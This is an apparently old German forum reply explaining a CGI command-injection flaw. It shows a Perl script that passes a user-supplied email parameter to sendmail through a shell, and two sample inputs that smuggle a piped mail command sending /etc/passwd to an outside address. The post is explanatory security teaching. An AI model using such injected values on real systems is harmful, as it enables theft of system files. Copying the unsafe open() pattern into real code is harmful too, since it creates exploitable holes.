Hi,

Das an sich auch nicht.
Ich erinnere mich dunkel, dass das Sicherheitsproblem dann auftritt, wenn der fehlerhaften URL
noch Scripts oder sowas mitgegeben wird.
Vielleicht sowas wie www.taskmanager.net/xyz.html|mail hihi@gmx.net < /etc/passwd

Das hat insofern was mit der URL zu tun, als dass es ueber die URL uebergeben wird - mehr auch
nicht.
Die wirkliche Sicherheitsluecke liegt im Script, etwa bei aufrufen dieser Art:
URL: bla.blub.net/cgi-bin/bla.pl?email=xyz%40bla.de%7Cmail+just_another%40email.address+%3C+%2Fetc%2Fpasswd

use CGI qw/param/;
my $email = param("email");
open(SENDMAIL,"|/usr/sbin/sendmail $email");

Weil damit im Grunde eine Shell geoeffnet wird und der shellcode dahinter interpraetiert wird.

Wenn du mehr dazu wissen willst, schau dich mal auf http://cgi.xwolf.com um.

Gruss,
 Christian
 http://wwwtech.de